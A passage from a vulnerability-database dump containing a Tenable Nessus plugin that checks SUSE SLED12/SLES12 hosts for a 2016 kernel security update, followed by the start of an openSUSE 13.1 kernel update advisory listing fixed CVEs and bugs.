(bnc#960561).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-15T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1019-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8709", "CVE-2015-8812", "CVE-2015-8816", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3139", "CVE-2016-3156"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1019-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90531", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1019-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90531);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-8709\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3139\", \"CVE-2016-3156\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1019-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to 3.12.57 to\nreceive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel\n driver when the network was considered congested. The\n kernel would incorrectly misinterpret the congestion as\n an error condition and incorrectly free/clean up the\n skb. When the device would then send the skb's queued,\n these structures would be referenced and may panic the\n system or allow an attacker to escalate privileges in a\n use-after-free scenario. (bsc#966437)\n\n - CVE-2015-8816: A malicious USB device could cause a\n kernel crash in the USB hub driver. (bnc#968010).\n\n - CVE-2016-2143: On zSeries a fork of a large process\n could have caused memory corruption due to incorrect\n page table handling. (bnc#970504)\n\n - CVE-2016-2184: A malicious USB device could cause a\n kernel crash in the alsa usb-audio driver. (bsc#971125).\n\n - CVE-2016-2384: A malicious USB device could cause a\n kernel crash in the alsa usb-audio driver. (bsc#966693)\n\n - CVE-2016-2782: A malicious USB device could cause a\n kernel crash in the usb visor driver. (bnc#968670).\n\n - CVE-2016-3139: A malicious USB device could cause a\n kernel crash in the wacom driver. (bnc#970909).\n\n - CVE-2016-3156: Removal of ipv4 interfaces with a large\n number of IP addresses was taking very long.\n (bsc#971360).\n\n - CVE-2015-8709: kernel/ptrace.c in the Linux kernel\n mishandled uid and gid mappings, which allowed local\n users to gain privileges by establishing a user\n namespace, waiting for a root process to enter that\n namespace with an unsafe uid or gid, and then using the\n ptrace system call. NOTE: the vendor states 'there is no\n kernel bug here (bnc#960561).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=816099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=875631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=880007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959146\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961658\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965087\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969992\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970062\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8709/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8812/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2384/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161019-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ac814a9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-600=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-600=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-600=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-600=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-600=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-600=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.57-60.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.57-60.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:37:45", "description": "The openSUSE 13.1 kernel was updated to 3.12.57 to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2015-8785: The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel allowed local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov. (bsc#963765)\n\n - CVE-2015-8551: The PCI backend driver in Xen, when running on an x86 system and using Linux as the driver domain, allowed local guest administrators to hit BUG conditions and cause a denial of service (NULL pointer dereference and host OS crash) by leveraging a system with access to a passed-through MSI or MSI-X capable physical PCI device and a crafted sequence of XEN_PCI_OP_* operations, aka 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8552: The PCI backend driver in Xen, when running on an x86 system and using Linux as the driver domain, allowed local guest administrators to generate a continuous stream of WARN messages and cause a denial of service (disk consumption) by leveraging a system with access to a passed-through MSI or MSI-X capable physical PCI device and XEN_PCI_OP_enable_msi operations, aka 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel driver when the network was considered congested. The kernel would incorrectly misinterpret the congestion as an error condition and incorrectly free/clean up the skb. When the device would then send the skb's queued, these structures would be referenced and may panic the system or allow an attacker to escalate privileges in a use-after-free scenario.(bsc#966437).\n\n - CVE-2015-8816: A malicious USB device could cause kernel crashes in the in hub_activate() function (bnc#968010).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function in drivers/tty/tty_io.c in the Linux kernel allowed local users to obtain sensitive information from kernel memory or cause a denial of service (use-after-free and system crash) by making a TIOCGETD ioctl call during processing of a TIOCSETD ioctl call. (bsc#961500)\n\n - CVE-2016-2184: A malicious USB device could cause kernel crashes in the alsa usb-audio device driver (bsc#971125).\n\n - CVE-2016-2384: A double free on the ALSA umidi object was fixed. (bsc#966693).\n\n - CVE-2016-2782: A malicious USB device could cause kernel crashes in the visor device driver (bnc#968670).\n\n - CVE-2016-3139: A malicious USB device could cause kernel crashes in the wacom device driver (bnc#970909).\n\n - CVE-2016-3156: A quadratic algorithm could lead to long kernel ipv4 hangs when removing a device with a large number of addresses. (bsc#971360).\n\nThe following non-security bugs were fixed :\n\n - acl: Fix problem with setting ACL on directories (bsc#867251).\n\n - acpi / processor: Introduce apic_id in struct processor to save parsed APIC id (bsc#959463).\n\n - alsa: rawmidi: Make snd_rawmidi_transmit() race-free (bsc#968018).\n\n - alsa: seq: Fix leak of pool buffer at concurrent writes (bsc#968018).\n\n - arm: cubox: Add separate cubox configuration.\n\n - arm: xen: implement multicall hypercall support.\n\n - block: xen-blkfront: Fix possible NULL ptr dereference (bsc#957986 fate#320625).\n\n - btrfs-8394-qgroup-Account-data-space-in-more-proper-timi n.patch: (bsc#963193).\n\n - btrfs: Add handler for invalidate page (bsc#963193).\n\n - btrfs: check prepare_uptodate_page() error code earlier (bnc#966910).\n\n - btrfs: delayed_ref: Add new function to record reserved space into delayed ref (bsc#963193).\n\n - btrfs: delayed_ref: release and free qgroup reserved at proper timing (bsc#963193).\n\n - btrfs: extent_io: Introduce needed structure for recoding set/clear bits (bsc#963193).\n\n - btrfs: extent_io: Introduce new function clear_record_extent_bits() (bsc#963193).\n\n - btrfs: extent_io: Introduce new function set_record_extent_bits (bsc#963193).\n\n - btrfs: extent-tree: Add new version of btrfs_check_data_free_space and btrfs_free_reserved_data_space (bsc#963193).\n\n - btrfs: extent-tree: Add new version of btrfs_delalloc_reserve/release_space (bsc#963193).\n\n - btrfs: extent-tree: Switch to new check_data_free_space and free_reserved_data_space (bsc#963193).\n\n - btrfs: extent-tree: Switch to new delalloc space reserve and release (bsc#963193).\n\n - btrfs: fallocate: Add support to accurate qgroup reserve (bsc#963193).\n\n - btrfs: fix invalid page accesses in extent_same (dedup) ioctl (bnc#968230).\n\n - btrfs: fix page reading in extent_same ioctl leading to csum errors (bnc#968230).\n\n - btrfs: fix warning in backref walking (bnc#966278).\n\n - btrfs: qgroup: Add handler for NOCOW and inline (bsc#963193).\n\n - btrfs: qgroup: Add new trace point for qgroup data reserve (bsc#963193).\n\n - btrfs: qgroup: Avoid calling btrfs_free_reserved_data_space in clear_bit_hook (bsc#963193).\n\n - btrfs: qgroup: Check if qgroup reserved space leaked (bsc#963193).\n\n - btrfs: qgroup: Cleanup old inaccurate facilities (bsc#963193).\n\n - btrfs: qgroup: Fix a race in delayed_ref which leads to abort trans (bsc#963193).\n\n - btrfs: qgroup: Fix a rebase bug which will cause qgroup double free (bsc#963193).\n\n - btrfs: qgroup: Fix dead judgement on qgroup_rescan_leaf() return value (bsc#969439).\n\n - btrfs: qgroup: Introduce btrfs_qgroup_reserve_data function (bsc#963193).\n\n - btrfs: qgroup: Introduce functions to release/free qgroup reserve data space (bsc#963193).\n\n - btrfs: qgroup: Introduce new functions to reserve/free metadata (bsc#963193).\n\n - btrfs: qgroup: Use new metadata reservation (bsc#963193).\n\n - cpu: Provide smpboot_thread_init() on !CONFIG_SMP kernels as well.\n\n - dcache: use IS_ROOT to decide where dentry is 